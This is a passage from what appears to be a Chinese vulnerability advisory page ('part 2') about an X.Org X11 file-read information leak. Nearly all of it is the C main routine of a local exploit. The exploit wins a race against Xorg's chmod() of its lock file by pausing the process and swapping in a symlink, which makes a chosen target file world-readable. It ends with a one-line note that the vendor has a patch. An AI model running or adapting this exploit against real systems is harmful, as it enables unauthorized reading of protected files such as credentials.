X.Org X11文件读取权限信息泄露漏洞(2)

/* we must ensure that Xorg is not already running on this display */
  if (stat(lockfile, &st) == 0) {
    printf("[-] %s exists, maybe Xorg is already running on this"
           " display?  Choose another display by editing the DISPLAY"
           " attributes.\n", lockfile);
    return 1;
  }

/* this avoid execution to continue (and automatically switch to another
   * TTY).  Xorg quits with fatal error because the file that /tmp/.X?-lock
   * links does not exist.
   */
  symlink("/dontexist", lockfile);

/* we have to force this mask to not comprise our later checks */
  umask(077);

ttyno = get_tty_number();

printf("[+] Trying to stop a Xorg process right before chmod()\n");
  while (--current_attempt) {
    proc = launch_xorg_instance();

n = 0;
    while (n++ < 10000)
      if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
    break;

if (ret == 0) {
      syscall(SYS_kill, proc, SIGSTOP);
      printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc);

stat(lockfiletmp, &st);
      if ((st.st_mode & 4) == 0)
    break;

printf("[-] %s file has wrong rights (%o)\n"
         "[+] removing it by launching another Xorg process\n",
         lockfiletmp, st.st_mode);
      launch_xorg_instance();
      sleep(7);
    }

kill(proc, SIGKILL);
  }

if (current_attempt == 0) {
    printf("[-] Attack failed.\n");

if (!ttyno)
      printf("Try with console ownership: switch to a TTY* by using "
         "Ctrl-Alt-F[1-6] and try again.\n");

return 1;
  }

printf("[+] Removing %s by launching another Xorg process\n",
         lockfiletmp);
  launch_xorg_instance();
  sleep(7);

if (stat(lockfiletmp, &st) == 0) {
    printf("[-] %s lock file still here... :(\n", lockfiletmp);
    return 1;
  }

printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp,
         target_file);
  symlink(target_file, lockfiletmp);

printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc);
  kill(proc, SIGCONT);

/* wait for chmod() to finish */
  usleep(300000);

stat(target_file, &st);
  if (!(st.st_mode & 004)) {
    printf("[-] Attack failed, rights are %o.  Try again!\n", st.st_mode);
    return 1;
  }

/* cleaning temporary link */
  unlink(lockfile);

printf("[+] Attack succeeded, ls -l %s:\n", target_file);
  show_target_file(target_file);

return 0;
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

X.org
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwfdwf.html